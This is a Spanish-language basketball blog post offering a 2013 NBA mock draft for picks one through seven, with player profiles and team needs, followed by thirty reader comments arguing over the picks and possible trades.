Mock Draft 2013 (picks 1-7)

26 de May de 2013 por Jose_Dantley

Inauguramos la temporadas de mock drafts en TJNBA. La pura verdad es que los mock drafts no dejan de ser un intento de adivinar algo que incluso los propios GM de la NBA aún no saben y que, si lo supieran, probablemente enviarían mensajes contrarios a lo que buscan. Aún así, los mocks son una oportunidad estupenda para comenzar a vislumbrar a algunas futuras estrellas de la NBA.

El draft de 2013 es calificado casi por consenso como uno de los más flojos de la última década. Esta calificación hay que ponerla un poco en cuarentena. La realidad es que es el probablemente de este draft saldrá el pick 1 con menos expectativas en mucho tiempo. Noel o McLemore, los dos candidatos principales, no parten con el futuro que se les había concedido a anteriores números 1. Claro que luego la realidad no sabe de drafts y, por mucho upside que tuvieran, nos encontramos con grandes “glorias” como Olowokandi o Kwame Brown drafteados en el número 1, y a jugadores drafteados en las profundidades del draft o incluso no drafteados como Ginóbili, Rodman, Arenas o Ben Wallace.

Pero si seguimos bajando en el draft de 2013, no parece a priori que las rondas bajas y las segundas rondas sean peores que en años anteriores. Quien haga bien su scouting puede encontrar buen material para completar plantillas a bajo coste, y el coste es algo que con el nuevo convenio es más importante que nunca.

En esta primera entrega nos centraremos en las siete primeras elecciones de lotería. Nuestro mock tiene en cuenta las necesidades de los equipos, pero somos conscientes de que muchos equipos van a draftear con el criterio BPA, best player available o de mejor jugador disponible.

1. Cleveland Cavaliers

McLemore

Ben McLemore  SG – 20 años/ 6’5″/ 190 lb -Kansas, Freshman

Necesidades más urgentes: SF

Con un número 1, lo lógico no es draftear por necesidad. Si fuera así, la elección más fiable sería Otto Porter. Pero Cleveland drafteará al teórico mejor jugador de futuro, aunque sea Noel o McLemore pudiera inducir a pensar que reconocen errores en las elecciones de Dion Waiters o Tristan Thompson, dos jugadores aprovechables pero que fueron drafteados demasiado arriba.

Nos vamos a decantar por McLemore porque ofrece más seguridad médica que Noel, como explicaremos más adelante. Ben McLemore es un tirador excelso. Su tiro es una obra de arte de la mecánica humana. Hay cientos de vídeos pero nos vamos a quedar con un video casero en la que se ve a McLemore flotar y hacer el tiro sin esfuerzo.

Además McLemore es muy atlético, lo que le permite ser muy eficiente en transición y dejarnos de cuando en cuando un highlight. El problema es que esas características han sido comunes a muchos jugadores antes, muchos de los cuales han sido fracasos. ¿Es McLemore el próximo Ray Allen? ¿Un Michael Redd atlético? ¿O simplemente un Brandon Rush o una versión pequeña de Gerald Green? Los números de McLemore no son espectaculares aunque sea su primer año –si bien tiene 20 años.

Por otro lado, no parece poseer capacidad de liderazgo para echarse un equipo a sus espaldas. Dudas, muchas dudas, pero si resulta ser simplemente un tirador que abra defensas y el potencial defensivo lo desarrolla, quizá, al menos, el riesgo es limitado.

Otras opciones: Nerlens Noel

Pick sorpresa: Otto Porter o, una opción no tan sorprendente: vender la ronda. El problema es que no se está valorando demasiado ante la falta de una superestrella.

2. Orlando Magic

nerlens noel

Nerlens Noel  PF/C – 19 años/ 7’0″/ 206 lb -Kentucky, Freshman

Necesidades más urgentes: PG, SG

Orlando lo necesita todo, pero Vucevic y Nicholson parecen lo más interesante, con la duda también de si el último tramo de Harris fue indicativo de su valor futuro. En la elección entramos ya en la típica cadena de pensar quiénes han sido elegidos previamente. Suponiendo que vamos acertando en el draft, la elección estaría entre Noel y Burke. Noel es redundante con Nicholson si aceptamos la teoría dominante de que Noel tendrá que acabar jugando de PF por falta de peso. Burke es probablemente a día de hoy el mejor jugador del draft y es un gran sustituto de Nelson. Nos ponemos en la piel del GM de Orlando y cualquier decisión equivocada puede ser motivo de despido, pero teniendo en cuenta el potencial defensivo de Noel, nos decantamos por él.

Nerlens Noel es un 7 pies, exageramente dinámico en defensa. En forma y con minutos no sería totalmente descartable que ocupara las primeras posiciones tanto en tapones como en robos. Sus instintos defensivos son felinos. No recuerdo nada parecido. Además, parece un chico muy centrado y con ganas de trabajar. Aquí acaban los pros. Los contras son tres fundamentalmente: lesiones, posición y ataque.

Su lesión fue tremenda –intentando un tapón imposible, que, por cierto, consiguió. Su rodilla no le permitirá volver, como pronto, hasta diciembre o enero. Además, no es la primera lesión grave que tiene y su forma de jugar es propensa a estas lesiones. Draftear al próximo Greg Oden no es algo muy agradable. En segundo lugar, con unos 93 kilos ¿puede enfrentarse a muchos centers? Su posición tendrá que ser power forward o, alternativamente, coger peso, lo cual irá en contra de sus rodillas. Finalmente, en ataque aporta poco. No tiene capacidad de crear juego alguno en ataque.

El GM que lo elija no respirará tranquilo hasta que no vea que ha merecido la pena el riesgo. Si al final sólo resulta ser una versión mejorada de Jarvis Varnado o si sus lesiones no le permiten desarrollar su potencial, la decisión habrá sido errónea.

Otras opciones: McLemore si está disponible o, sobre todo, Trey Burke si deciden mejorar el puesto de base.

Pick sorpresa: Anthony Bennett. Necesitan juego ofensivo. Bennett proyecta ser una buena arma ofensiva.

3. Washington Wizards

otto porter

Otto Porter  SF – 19 años/ 6’9″/ 200 lb -Georgetown, Sophomore

Necesidades más urgentes: SF, PF

Quizá el pick más fácil. Porter puede ser el jugador con menos interrogantes: viene de Georgetown, es decir, Washington, y cubre la mayor necesidad de los Wizards. Webster es una solución razonable a corto plazo, pero no es fiable en cuanto a las lesiones ni parece tener el nivel para acompañar a Wall y Beal.

Otto Porter no es un jugador especialmente excitante. No destaca en nada ni tiene lagunas serias en su juego. No es un tirador, pero su selección de tiro le permite tener buenos porcentajes. Va bastante bien al rebote. Es un buen defensor, aunque tiene margen de mejora y, como siempre en estos casos, queda la duda de si podrá mantener esa defensa contra jugadores posiblemente más fuertes que él. En definitiva, estamos ante un jugador que parece ofrecer un valor seguro aunque tampoco da garantías de acabar siendo una estrella. Las comparaciones habituales, desde mi punto de vista, están más cerca del físico que del juego en sí. En ese sentido, tiene una presencia similar a Prince, aunque creo que en ataque, al menos ahora, tendrá menos recursos.

Otras opciones: McLemore o Noel si están libres. Bennett si prefieren arriesgar.

Pick sorpresa: Oladipo. Tienen a Beal, pero quizá prefieran ir a por un seguro en defensa.

4. Charlotte Bobcats

Bennett

Anthony Bennett  SF/PF – 20 años/ 6’7″/ 240 lb -UNLV, Freshman

Necesidades más urgentes:  SG, PF, C

Quizá todavía Biyombo puede ser su center de futuro, así que parece más probable mirar al puesto de escolta (Henderson) o alero alto (Mullens) como más débiles.

Oladipo es una opción pero es demasiado parecido a Michael Kidd-Gilchrist, con lo que probablemente el atasco ofensivo se multiplicaría. Bennett es un riesgo enorme. Me parece perfectamente razonable que acabara en cualquier posición entre el 1 y el 9. Por un lado, se encuentra lesionado, en principio de una lesión menor en el hombro, pero esto le impedirá hacer workouts para sacar de dudas a los equipos. Por otro lado, esas dudas a las que nos referimos son muchas.

La primera gran duda es ¿SF o PF? Es lento para jugar de 3. No tiene estatura para jugar de 4, aunque lo compensa con una buena envergadura. Ya sabemos que la historia nos da a grandes 4 que medían menos que Bennett, pero la duda está ahí. La segunda gran duda es la intensidad. En defensa “se deja llevar” ¿Mejorará esa actitud cuando sea necesario?

En la parte positiva, Bennett es uno de los grandes talentos de este draft en ataque, incluso se podría discutir si el mejor. Tiene movimientos en la zona, tiene potencia, tiene tiro incluso de larga distancia. También ayuda en el rebote ofensivo y defensivo. Un aspecto que debe mejorar es que le cuesta horrores mover el balón. Promedia una asistencia por partido.

Si Charlotte entiende que puede jugar de 4, la presencia de Kidd-Gilchrist como eje defensivo les puede permitir arriesgar con Bennett.

Otras opciones: McLemore, Noel, aunque ya es difícil que esté a estas alturas. Oladipo.

Pick sorpresa: Algún center porque no confíen en el desarrollo de Biyombo.

5. Phoenix Suns

Oladipo

Victor Oladipo  SG – 21 años/ 6’4″/ 215 lb -Indiana, Junior

Necesidades más urgentes: Todo excepto PG, aunque especialmente SG y C.

Victor Oladipo, si llegase a estas alturas, es un pick cantado para los Suns. Necesitan un escolta inmediatamente y necesitan cierta esperanza. Ninguno de los cuatro jugadores que hemos pronosticado anteriormente traen la ambición que sí tiene Oladipo. Su juego de ataque es muy limitado, basado principalmente en el físico, aunque su tiro ha ido mejorando y tiene la capacidad de seleccionar adecuadamente.

El punto fuerte de Oladipo es la defensa. Lógicamente, las comparaciones van en la línea de Tony Allen, aunque quizá Oladipo pudiera aportar más en ataque.

Es uno de los jugadores más atléticos del draft y como muestra, este mate al poste:

Otras opciones: Alguno de los anteriores o ir a por un hombre alto, como Len o Zeller.

Pick sorpresa: Kentavious Caldwell-Pope, buscando un escolta anotador.

6. New Orleans Pelicans

alex len

Alex Len  C – 19 años/ 7’1″/ 255 lb -Maryland, Sophomore

Necesidades más urgentes: SG –si Gordon no sigue o no se recupera-, SF, C

No creo que Robin López sea el center sobre el que sacar adelante la franquicia, y Anthony Davis debería jugar lo menos posible en esa posición. Por tanto, un buen center, preferiblemente con buena capacidad ofensiva, puede ser una buena solución. Len deja dudas en cuanto a intensidad y en defensa –las cifras de robos son ridículamente bajas, no así la de tapones. Pero ha dado señales de que puede tener un buen desarrollo en los aspectos ofensivos del juego. No nos gusta la comparación con Ilgauskas, pero ya se sabe la tendencia a comparar por razones simplistas: lituano, center.

Otras opciones: Si Porter llegara aquí sería claramente la opción. Burke es otra posibilidad porque lo consideren el BPA y lo vean un buen complemente de Greivis Vasquez.

Pick sorpresa: C.J. McCollum. Buscarían un tirador que añadir a Ryan Anderson. Abrirían el juego muchísimo, pero a costa de sufrir más en defensa.

7. Sacramento Kings

burke

Trey Burke  PG – 20 años/ 6’1″/ 185 lb -Michigan, Sophomore

Necesidades más urgentes: Todo menos C y, quizá, SG

Cody Zeller podría encajar mejor. Al fin y al cabo, el mal menor en el puesto de base es Thomas, que ha demostrado que puede ser un anotador eficiente sin ser un desastre en la dirección, pero la tentación es demasiado grande si Burke cae hasta aquí.

Trey Burke ha sido el mejor jugador del año en la NCAA. Eso no es garantía de éxito, pero sí de que el riesgo en la elección es bajo. Burke es un excepcional director de juego que además tiene capacidad de crearse sus propios tiros. Es un buen tirador de larga distancia y como asistente destaca en todas las facetas, tanto en juego estático como en transición. Las comparaciones con Chris Paul son excesivas, pero no es mala referencia para entender el tipo de juego que ofrece. No obstante, una de las grandes diferencias con Paul es que Burke no tiene el nivel defensivo que ya mostraba a estas alturas el base de los Clippers.

Otras opciones: Cody Zeller. Oladipo y Porter si estuvieran aún aquí. Michael Carter-Williams.

Pick sorpresa: Len si estuviera disponible. Algo raro se cocería en el ambiente.

La próxima semana publicaremos la segunda mitad de las elecciones de lotería, picks del 8 al 14.

Comenta

30 comentarios a esta entrada

  1. Simon dice:
    #1

    La verdad es que este draft plantea muchas incognitas. Yo veo un monton de jugadores que pueden pasar de salir con el 2 o 3 o ya no salir hasta el 9 o 10…Por ejemplo Burke… creo que o sale con el 2 o no va a salir hasta el 7 ( o más atrás ).
    Yo que apenas veo el March Madness. Y solo he visto videos de Highlights de Muhammad me la jugaría con el si fuera el GM de Phoenix. A pesar de todos sus lios y el cartel de individualista, parace según los analistas que es el único que pudiera terminar convirtiendose en un jugador franquicia ( menor ) por los que en casos como el de Phoenix en el que en el 5 ya puedes jugarte un poco más la eleccion y viendo que Oladipo ( o cualquiera ) no les va a sacar de pobres de manera inmediata pues me la jugaría con el… idéntico caso para equipos como Cleveland u Orlando pero estos si que tienen picks en los que mejor no jugartela demasiado o tu puesto como GM puede volar…
    En cuanto a lo de vender su pick numero 1… pues la verdad que para los Cavs no sería del todo provechoso, pues nadie va a dar algo bueno de verdad por el uno del draft de este año viendo que no hay casi nadie realmente potable ( para jugador franquicia hablando )… asi que tendrán que comerse el “marrón” ( entiendase ) yo de ellos cogería a Mclemore sin complicarme demasiado… es la opción más segura… pues coger a Noels es demasiado riesgo.

      Citar

  2. Simon dice:
    #2

    Y por cierto no veo estrellas, pero por lo que leo y veo creo que el nivel medio del draft será bastante decente, hay muchos jugadores que pueden salir del 10 para atrás muy potables y jugadores de equipo. No saldrán estrellas pero saldrán muchos complementes y jugadores de roles definidos de este draft.

      Citar

  3. Denise dice:
    #3

    Pues yo no estoy en desacuerdo muchos picks.

    Pick 1
    Suponiendo que los Cavs no traspasen su ronda, el 1 creo que va a ser Noel, ¿para que quieren los Cavs a McLemore habiendo escogido a Waiters el año pasado? Además, viendo la cantidad de partidos que se pierde cada año Varejao por lesiones, lo más logico es que refuercen la pintura con Noel

    Pick 2
    Es un secreto a voces que los Magic elegirán ó a McLemore ó a Burke. Noel creo que saldrá el pick1, pero aunque no salga, Orlando con Harris, Vucevic, Glen Davis, y Nicholson no necesita a nadie en la pintura a no ser que sea un All-Star ó un potencial All-Star. Y no veo yo a un rookie Noel saliendo de una ACL mejorar la pintura de los Magic.
    Espero y deseo que elijan al jugón Trey Burke, aunque para no hacer el feo, creo que elegiran a McLemore, el cual, en los videos que he visto, solo mete tiros abiertos y mates al contraataque, no tiene manejo de bol, no sabe driblar, no sabe buscarse sus propios tiros, lo comparan con Ray Allen?? yo con un Jason Richardson en versión mala.

    Pick 3
    Ese sí estoy de acuerdo, Ariza no ha dado el nivel en los Wizards, y un backcourt Wall-Beal-Porter estaría genial.

    Pick 4
    También puede que sea Bennett. Los Bobcats tienen su backcourt completo con Walker, Gilchrist y Henderson, por lo que necesita es meter algo de musculo y fuerza en la pintura

    Pick 5
    Creo que los Suns se la van a jugar con Muhammad. Necesitan un ala con calidad tras los fiascos de Beasley y Wesley Johnson, por lo que Muhammad es el mejor posicionado. Mucha calidad de este chaval, pero dicen por ahí que tiene muy mala cabeza. Ya veremos donde acaba.

    Pick 6
    Si Burke no es elegido por los Magic, creo que será el pick de los Hornets. Vasques ha hecho un temporadón, en verano de 2014 es free agent y de seguir así va a pedir el oro y el moro, por lo que sería un movimiento acertado el cubrirse las espaldas con un jugón en toda regla como Burke, el cual, repito, espero que acabe en Orlando.

    Pick 7
    Creo que los Kings necesitan urgentemente reforzar su pintura. La duda es si escogerán a Len ó a Cody Zeller. Me decanto por Len.

      Citar

  4. Denise dice:
    #4

    Simon:
    La verdad es que este draft plantea muchas incognitas. Yo veo un monton de jugadores que pueden pasar de salir con el 2 o 3 o ya no salir hasta el 9 o 10…Por ejemplo Burke… creo que o sale con el 2 o no va a salir hasta el 7 ( o más atrás ).

    Exacto, yo creo que hasta el propio Noel, si no saliese el pick 1, sería el pick 4. Orlando en teoría no lo quiere a no ser que sea para traspasarlo, y los Wizards ya tienen bastante cristal de bohemia con Nené como para pillar a un tío con ACL. Sería épico que Noel fuese elegido en el pick 4 por los Bobcats y se conviertiera en otro pufo más elegido por Michael Jordan ó por el cerebrito que dirija esa franquicia.
    Y sobre Burke, lo que tu dices, ó sale el pick 2 por los Magic ó se va muy atrás, ya que, los equipos que eligen primero, tienen la posición de PG más que cubierta (Irving, Wall, Kemba Walker, Dragic)..

      Citar

  5. Denise dice:
    #5

    Una pregunta para los que ven la NCAA. ¿Por qué el tal Luke Hancock, MVP de la Final NCAA, no aparece en ningun mock ni en primera ni en segunda ronda?
    ¿Podría tratarse de un buen robo post-Draft ó es que es un pavo que tuvo el día bueno en la final y poco más?

      Citar

  6. Melo15 dice:
    #6

    +1 Denise.
    Totalmente claro que los Cavs no van a seleccionar a McLemore, ya que con Waiters tienen un escolta de futuro.
    La opcion optima para los Cavs seria traspasar su pick, ya que creo que los Cavs el año de que vienen han de rozar los Playoffs si o si.
    Los Magic se haran con McLemore por la sencilla razon, que en estos momentos en la NBA hay mucha mas calidad en el puestode 1 queen el de 2.
    Los Wizards iran a a la opcion segura y pillaran a Porter, aunque un duo Wall-Beal-Bennett seria imparable.
    Los Bobcats son un dilema, pero yo creo que como necesitan de todo menos base y alero, pues pillaran a lo mejor que puedan.
    En la quinta los los Suns han de pillar a Oladipo, porque cogen a un futuro titular que no les va a sacar de pobres, y el año que viene, en el 2014 se pillan al crack que quieran, porque habrá para regalar.
    En la sexta los Pelicans cogeran a Burke.
    En la séptima los Kings son una incognita. Si conservan a Cousins, coger a un pivot es una tontería, lo ideal seria un alero, pero coger a Muhammad serian una tontería, mas chupones no necesitan en Sac.

      Citar

  7. portu dice:
    #7

    Creo q las franquicias con los 7 primeros picks no van a estar demasiado preocupados por si aciertan o no, creo q van a buscar jugadores de rol, q puedan encajar bien en el futuro y q aporten, pero no creo q quieran seriamente mejorar mucho este año…equipos como Orlando van a hacer nuevamente tanking mode (via disimulada desmembrando el equipo, claro) para optar el año q viene a Wiggins o algun otro futuro crack q pueda cambiar el futuro de una franquicia.

      Citar

  8. Denise dice:
    #8

    portu:
    Creo q las franquicias con los 7 primeros picks no van a estar demasiado preocupados por si aciertan o no, creo q van a buscar jugadores de rol, q puedan encajar bien en el futuro y q aporten, pero no creo q quieran seriamente mejorar mucho este año…equipos como Orlando van a hacer nuevamente tanking mode (via disimulada desmembrando el equipo, claro)para optar el año q viene a Wiggins o algun otro futuro crack q pueda cambiar el futuro de una franquicia.

    Yo no creo que Orlando vaya a hacer tanking descaradamente. Simplemente, el año que viene tienen que seguir pagando 22 millones a Arenas, más 6 a Turkoglu y 3,5 a Harrington (éstos 2 últimos serán cortados del equipo) y como comprenderás, con este dineral, no van a lanzarse en el mercado de agentes libres a por buenos jugadores y a ofrecer grandes contratos.
    Seguirán apostando porque todos los jóvenes que tienen vayan progresando y si llegan a playoffs (no descartable viendo el nivel del Este) bien, y si vuelven a quedar últimos, pues bien siempre y cuando vuelvan a dar la imagen seria y competitiva que han dado este año pese a solo ganar 20 partidos.

      Citar

  9. Esteban dice:
    #9

    Comparto en asumir el riesgo que llea consigo muhammed, viendo como puede anotar y las cualidades q tiene me la jugaria con el, siendo los suns o los bobcats, sobretodo ya q necesitan alguien que pueda lanzar

    Del pick de bobcats o suns no pasara muhammed,

      Citar

  10. Txusma dice:
    #10

    Denise:
    Una pregunta para los que ven la NCAA. ¿Por qué el tal Luke Hancock, MVP de la Final NCAA, no aparece en ningun mock ni en primera ni en segunda ronda?
    ¿Podría tratarse de un buen robo post-Draft ó es que es un pavo que tuvo el día bueno en la final y poco más?

    Hancock tuvo unos días muy buenos en la Final Four pero era un jugador de ro que hizo su trabajar tras anotar los tiros abiertos q le llegaron a las manos. De Kansas los “buenos” eran Russ Smith y Gorgui Dieng, uno ha dicho q saltará el próximo año y el otro se presenta y apunta a 1ª ronda.

      Citar

  11. jose_dantley dice:
    #11

    Por alusiones ¡¡

    Un plantilla la forma no solo el quinteto inicial. Es más, el corazón de una plantilla no es el quinteto, sino dependiendo del entrenador, entre 6 y 9 jugadores. Por eso, McLemore tiene sentido para los Cavs por tres razones:

    1. Es el jugador con más proyección a priori y con el 1 no drafteas por necesidad a menos que quieras hacer un Sam Bowie
    2. Irving y Waiters no van a jugar 48 minutos. Hay minutos de sobra. Waiters si McLemore funciona puede salir de 6º.
    3. Sustituir a Varejao que se lesiona mucho por un rookie que se lesiona mucho te crea un problema doble si los dos se lesionan.

    En cualquier caso, he intentado huir de lo que dicen todos -de los mocks importantes, solo coincidimos con un par de ellos.

    Con Orlando pasa algo parecido, si sale Noel en el 1, claramente es Burke o McLemore, pero si Noel está listo, tanking que te crió. Vuelvo a lo mismo, con el 2, no drafteas por necesidad, no miras a 2013, miras a 2016 y piensas en un Noel-Vucevic, no en un Davis-Vucevic. Si puedes tener un Mutombo, no dices que no porque tienes a Glen Davis. Y además, compras papeletas para Andrew Wiggins.

    El tipo de argumentos “este jugador no puede ser un número X” no valen en este draft. Es profundo, pero arriba no tiene nada que no pudieras encontrar en un pick 5 u 8 en otros drafts.

    En cuanto a Muhammad, tiene demasiadas “red flags”. En UCLA no ha funcionado. Oladipo no creo que sea una superestrella. Si llega a algún All Star sería un éxito, pero sabes que te va a dar defensa, intensidad en los dos lados y que tanto en contrataque como en tiro estático las mete. ¿Para qué arriesgarte con un SF que anota solo teniendo la bola y con porcentajes regulares ante defensores regulares? El primer sitio donde alguien podría arriesgar es Detroit, pero incluso no descartaría que cayera fuera de lotería.

    Hancock, de Louisville, pues no lo veo. No creo que llegue ni a ligas de veranos, aunque quizá por aquello que es MVP de la final, alguien le dará una oportunidad. Hay muchos con más nivel antes. Louisville ganó por juego colectivo y defensa. Dieng está en el top-3 de mejores defensores interiores y Silva es la definición de mosca cojonera. Dieng será primera ronda, quizá incluso con opciones de lotería, y Silva será drafteado en 2ª ronda, ya se verá si más arriba o más abajo.

    Esto es lo que tienen los mocks, debate ¡¡¡

      Citar

  12. Txusma dice:
    #12

    Txusma: Hancock tuvo unos días muy buenos en la Final Four pero era un jugador de ro que hizo su trabajar tras anotar los tiros abiertos q le llegaron a las manos. De Kansas los “buenos” eran Russ Smith y Gorgui Dieng, uno ha dicho q saltará el próximo año y el otro se presenta y apunta a 1ª ronda.

    Dije Kansas y quería decir Louisville, claro…

      Citar

  13. Viva_Dirk dice:
    #13

    No es nada facil hacer un mock de este draft, asi que hay mas desacuerdos que en anteriores.

    Si McLemore es el Nº1, que yo creo que si, veo a Burke en el Nº2, sobre todo por el problema de la lesión de Noel y porque Burke además de aportar presente si creo que puede ser un gran base titular en la liga. Eso llevaría a Noel hasta el pick 4 ya que el 3 si parece obvio para Porter. Y claro, con Biyombo y MKG si eligen a Noel igual acaban algun partido con 30 puntos… lo norma es que eligieran a Bennett u Oladipo. Y con esto Noel caería hasta el 5 o 6.

      Citar

  14. melo15 dice:
    #14

    Pero quien dice que Noel sea un tio propenso a lesionarse?!
    Rondo ha tenido la misma lesión y no es tio que se lesione, es mas no se lesiona. Noel ha tenido una lesion que no es cronica como la fascitis plantar o los problemas esos de las rodillas de Roy.

    De todas maneras, draftear a Mclemore no tienen ningun sentido teniendo a Irving y a Waiters.
    Irving juega 35 minutos y Waiters 29 y el año que viene jugara mas. Mclemore no juega de base asi que podria jugar 18 minutos. Para tener a tu numero uno del Draft jugando 18 minutos, escoges a Otto Porte

    jose_dantley: En cuanto a Muhammad, tiene demasiadas “red flags”. En UCLA no ha funcionado. Oladipo no creo que sea una superestrella. Si llega a algún All Star sería un éxito, pero sabes que te va a dar defensa, intensidad en los dos lados y que tanto en contrataque como en tiro estático las mete. ¿Para qué arriesgarte con un SF que anota solo teniendo la bola y con porcentajes regulares ante defensores regulares? El primer sitio donde alguien podría arriesgar es Detroit, pero incluso no descartaría que cayera fuera de lotería.

    Yo no creo que Muhammad sepa anotar solo con balón. Al revés donde mas se destaca es anotandoen cortes y moviendose sin balón para tirar en catch & shot. Eso para equipos como Minnesota les iría muy bien ademas de que los porcentajes de Muhammad no son para nada malo: 45 en FG y 37 en T3.

      Citar

  15. jose_dantley dice:
    #15

    melo15:
    Pero quien dice que Noel sea un tio propenso a lesionarse?!

    Su historial médico. Con 16 años estuvo fuera casi una temporada completa por rotura de un cartílago en la rodilla. En su último año, sufrió tendinitis en ambas rodillas. Ahora el ACL. Además, su forma de jugar hace más probable posibles recaídas. Así que dos lesiones graves -temporada y media fuera de las últimas 4- + tendinitis + forma de jugar.

      Citar

  16. jose_dantley dice:
    #16

    Yo no creo que Muhammad sepa anotar solo con balón. Al revés donde mas se destaca es anotandoen cortes y moviendose sin balón para tirar en catch & shot. Eso para equipos como Minnesota les iría muy bien ademas de que los porcentajes de Muhammad no son para nada malo: 45 en FG y 37 en T3.

    Ten en cuenta el tipo de defensas NCAA. Esos porcentajes serían buenos en la NBA para un +20ppg. En la NCAA es el peor porcentaje de 2 entre todos los potenciales primeras rondas salvo Carter-Williams que es un caso aparte. Y no se traduce en una anotación demasiado alta. Pero todo es opinable y no sabremos si será un anotador fiable en la NBA hasta pasado un tiempo. Es lo bueno de los drafts, todos opinamos y al final te sale Paul George del final de la lotería, analizamos lo que dijimos hace años y se nos cae la cara de vergüenza, jaja

      Citar

  17. Laker1624 dice:
    #17

    No creo que McLemore sea la opción mas acertada para los Cavs. Por su tipo de perfil dudo que pueda compenetrarse en el backcourt con un jugador como Irving. Veo a ambos principalmente como anotadores, y por eso pienso que pueden tener los problemas de compatibilidad que por ejemplo tuvo Ellis con Curry y actualmente con Jennings.

    Si Cleveland finalmente escoge a McLemore supongo que será porque no quieren arriesgar con Noel debido a su lesión.

    En mi opinión, el jugador mas interesante de esta promoción es Trey Burke.

      Citar

  18. Denise dice:
    #18

    jose_dantley:
    Por alusiones ¡¡

    Un plantilla la forma no solo el quinteto inicial. Es más, el corazón de una plantilla no es el quinteto, sino dependiendo del entrenador, entre 6 y 9 jugadores. Por eso, McLemore tiene sentido para los Cavs por tres razones:

    1. Es el jugador con más proyección a priori y con el 1 no drafteas por necesidad a menos que quieras hacer un Sam Bowie
    2. Irving y Waiters no van a jugar 48 minutos. Hay minutos de sobra. Waiters si McLemore funciona puede salir de 6º.
    3. Sustituir a Varejao que se lesiona mucho por un rookie que se lesiona mucho te crea un problema doble si los dos se lesionan.

    A mi me sorprendería mucho que los Cavs eligieran a McLemore para quedarselo. Si lo pickean creo que sería para empaquetarlo y traspasarlo por un hombre alto, ejemplo:
    – McLemore, Speights, Varejao por Kevin Love y Derrick Williams
    – McLemore, Speights, Varejao por Pau Gasol y Jodie Meeks
    – McLemore, Speights, Varejao por Al Jefferson y el pick de Utah.

      Citar

  19. Viva_Dirk dice:
    #19

    Lo de Pau Gasol donde hay que firmarlo???

      Citar

  20. Denise dice:
    #20

    Viva_Dirk:
    Lo de Pau Gasol donde hay que firmarlo???

    jajaj solo es un ejemplo, para simbolizar que creo que los Cavs si eligen a McLemore es para traspasarlo por una estrella interior.
    Imaginemos que ese trade de Pau Gasol se cumple y al año siguiente, el agente libre Lebron ficha por los Cavs, ojito, que los jodidos Cavaliers podrían juntar en este supuesto un quinteto Irving-Waiters-Lebron-Thompson-Pau que los haría favoritos nº 1 al anillo.

      Citar

  21. Jose Luis dice:
    #21

    Pues para mí ese equipo tiene poco de favorito… Gasol con 34 años, Thompson que no es nada del otro mundo, Waiters un anotador normalito, y sí, Lebron e Irving… pero poco más.

      Citar

  22. txusma dice:
    #22

    Jose Luis:
    Pues para mí ese equipo tiene poco de favorito… Gasol con 34 años, Thompson que no es nada del otro mundo, Waiters un anotador normalito, y sí, Lebron e Irving… pero poco más.

    Hombre, que Lebron, un Wade cojo y un Bosh normalín se van a plantar en las finales. Como no va a ser favorito un equipo con Irving, Lebron, Gasol y 2 jóvenes como Waiters o Thompson?

      Citar

  23. Denise dice:
    #23

    Jose Luis: Pues para mí ese equipo tiene poco de favorito… Gasol con 34 años, Thompson que no es nada del otro mundo, Waiters un anotador normalito, y sí, Lebron e Irving… pero poco más.

    Hombre, Waiters y Thompson serán mucho mejores jugadores dentro de 2 años que ahora, y Pau con 34 años tiene mas calidad que el 70% de los hombres altos

      Citar

  24. Jose Luis dice:
    #24

    Pues sigo sin verlo favorito. Pau no es un gran tirador exterior como sí lo es Bosh, y Thompson tampoco. Colapsarán la zona que necesita Lebron para operar.

      Citar

  25. Simon dice:
    #25

    cambiando de tercio, parece confirmarse que Burke va a caer hasta el 7 u 8 porque los Kings están buscando traspasar a Isaiah Tomas a cambio de un pick entre el 20 y el 30… ( suena el 19 de Cleveland en concreto )

      Citar

  26. Denise dice:
    #26

    Simon:
    cambiando de tercio, parece confirmarse que Burke va a caer hasta el 7 u 8 porque los Kings están buscando traspasar a Isaiah Tomas a cambio de un pick entre el 20 y el 30… ( suena el 19 de Cleveland en concreto )

    Tranqui que los Magic no han dicho la ultima palabra y creo que Burke tiene un workout pendiente con ellos. Si mirais su Instagram en los ultimos días se ha estado entrenando en Orlando.
    Además creo que los Pelicans y los Pistons tambien deberían estar interesados en él.

      Citar

  27. txusma dice:
    #27

    Como dice Denise, Orlando aún no creo que lo haya descartado definitivamente. Parece que Bledsoe es su plan A pero si falla y los Cavs cogen, por lo que sea, a McLemore en el uno no descartaría que se decantasen con Burke.

      Citar

  28. Simon dice:
    #28

    ya, si lo lógico es que Burke pudiera salir en el 2 por Orlando, sería mas lógico que hacerse con Noel… pues a este no lo necesitan tanto y total ninguno les va a hacer crecer significativamente… pero algo de informacion tendrán los Kings cuando están intentanto traspasar a Thomas, no creo que traspasen a Thomas sin tener la certeza de que les va a llegar Burke…

      Citar

  29. Denise dice:
    #29

    Simon: ya, si lo lógico es que Burke pudiera salir en el 2 por Orlando, sería mas lógico que hacerse con Noel… pues a este no lo necesitan tanto y total ninguno les va a hacer crecer significativamente… pero algo de informacion tendrán los Kings cuando están intentanto traspasar a Thomas, no creo que traspasen a Thomas sin tener la certeza de que les va a llegar Burke…

    No sé, lo mismo van a por un base en la agencia libre…
    Por Orlando, otra cosa de la que se ha hablado es de la posibilidad de traspasar a Glen Davis a OKC por el pick 12 y algo más de los Thunder, y en el pick 12 ir a por el Carter-Williams, el base éste de 2 metros.

      Citar

  30. txusma dice:
    #30

    Simon:
    ya, si lo lógico es que Burke pudiera salir en el 2 por Orlando, sería mas lógico que hacerse con Noel… pues a este no lo necesitan tanto y total ninguno les va a hacer crecer significativamente… pero algo de informacion tendrán los Kings cuando están intentanto traspasar a Thomas, no creo que traspasen a Thomas sin tener la certeza de que les va a llegar Burke…

    Pueden prometer a Burke q si llega le cogen pero es imposible q tengan la certeza de que ningún equipo lo va a escoger antes.

    En Orlando todo apunta a que Davis y Afflalo dejarán el equipo en verano y los jóvenes tendrán tiempo de sobra para jugar y desarrollarse.

      Citar

Deja un comentario

